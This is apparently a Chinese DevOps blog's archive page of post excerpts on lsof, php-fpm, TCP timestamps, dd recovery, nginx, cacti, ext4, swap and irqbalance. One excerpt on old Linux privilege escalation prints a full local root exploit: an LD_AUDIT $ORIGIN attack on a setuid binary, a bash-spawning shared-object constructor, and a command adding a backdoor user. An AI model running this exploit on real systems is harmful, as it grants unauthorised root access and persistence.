如何使用lsof?
这篇文章中我会尽力列举我能想到的所有lsof的用法,让我们先从最简单的开始(或许你已经知道了),然后逐渐增加复杂度: 继续阅读
分类目录归档:DevOps
php-fpm的两种进程管理模式
php-fpm的进程数也是可以根据设置分为动态和静态的。
一种是直接开启指定数量的php-fpm进程,不再增加或者减少;另一种则是开始的时候开启一定数量的php-fpm进程,当请求量变大的时候,动态的增加php-fpm进程数到上限,当空闲的时候自动释放空闲的进程数到一个下限。 继续阅读
TCP RFC 1323网络优化的问题
[rfc1323]window7的Tcp1323Opts与linux的net.ipv4.tcp_timestamps和NAT
最近遇到一个内网win7用户无法上部分网站的问题,同网段的其他机器都是正常,出问题的机器访问其他网站也是正常。 继续阅读
dd备份坏道硬盘
有时候硬盘有坏道了,我们需要把数据读出来,我们可以用dd来干
dd if=/dev/sdb1 of=/mnt/datadisk/sdb1.img conv=noerror,sync #挂载 mount -o loop sdb1.img /mnt/sdb1
nginx在server_name指令中使用正则表达式
server_name的匹配顺序
nginx中的server_name指令主要用于配置基于名称虚拟主机,server_name指令在接到请求后的匹配顺序分别为: 继续阅读
cacti监控磁盘IO读写
前面说了ext3比ext4好,这个在磁盘io读写监控与磁盘事务监控图表中看起来很直观。默认cacti没有带IO监控功能,需要自己增加模板或者用perl的脚本采集。但是perl脚本比较麻烦。
升级ext3到ext4
ext4性能确实比ext3好的多,有一磁盘在ext3的时候,IO经常100%,更换到ext4后,io基本上60%左右浮动了。 继续阅读
增加swap分区
mkswap /dev/sda2 swapon /dev/sda2 然后根据UUID的挂载方法写入fstab
很久的linux提权的一些过程
阵列笔记mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
ls -l /proc/$$/fd/3
rm -rf /tmp/exploit/
ls -l /proc/$$/fd/3
vi s.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
gcc -w -fPIC -shared -o /tmp/exploit s.c
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 && adduser hack123 -p hack123
可以根据执行的命令,进行一系列的安全加固,比如ping的S权限等
irqbalance服务
irqbalance现在被证实为非常有必要的服务,他的主要功能是可以合理的调配使用各个CPU核心,特别是对于目前主流多核心的CPU,简单的说就是能够把压力均匀的分配到各个CPU核心上,对提升性能有很大的帮助,我引用一段话:
启用 irqbalance 服务,既可以提升性能,又可以降低能耗。
irqbalance 用于优化中断分配,它会自动收集系统数据以分析使用模式,并依据系统负载状况将工作状态置于 Performance mode 或 Power-save mode。
处于 Performance mode 时,irqbalance 会将中断尽可能均匀地分发给各个 CPU core,以充分利用 CPU 多核,提升性能。
处于 Power-save mode 时,irqbalance 会将中断集中分配给第一个 CPU,以保证其它空闲 CPU 的睡眠时间,降低能耗。
(详见:http://www.irqbalance.org/documentation.php)
#使用一下命令观察cpu中断分配使用情况 mpstat -P ALL 1